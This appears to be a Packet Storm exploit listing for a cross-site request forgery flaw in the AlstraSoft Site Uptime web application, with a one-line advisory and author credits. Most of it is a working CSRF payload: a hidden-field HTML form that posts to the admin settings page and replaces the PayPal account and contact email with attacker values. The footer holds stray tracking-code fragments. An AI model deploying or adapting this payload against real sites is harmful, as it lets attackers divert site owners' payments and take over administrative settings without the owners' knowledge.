AlstraSoft Site Uptime suffers from a cross site request forgery vulnerability.
3c0f8d5e7bf162dc8ae39a0705180f9dfb362cb5c9248900ca26594b354ca2b0# Exploit Title: AlstraSoft Site Uptime CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/alstrasoft-site-uptime/19680/
# Category:: webapps
# Demo : http://www.blizsoft.com/uptime/admin
# Greetz: Inj3ct0r Exploit DataBase 1337day.com
<form name="frmCSet" action="commonsettings.php" method="get">
<input name="rbShowCount" value="Y" checked="" type="hidden">
<input name="rbShowCount" value="N" type="hidden">
<input name="act" id="act" value="Update" type="hidden"></td>
<input name="txtpaypal" value="yourpaypalacc@paypal.com" type="hidden"></td>
<input name="txtcheckout" value="g0002" type="hidden">
<input name="txtcontact" value="mail@mail.com" type="hidden"></td>
<input name="btnUpdate" class="button" id="btnUpdate" value="Save Settings" type="submit">
<input name="BtnCancel" class="button" id="BtnCancel" value="Cancel" onclick="cancel();" type="hidden"></td>
</form>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed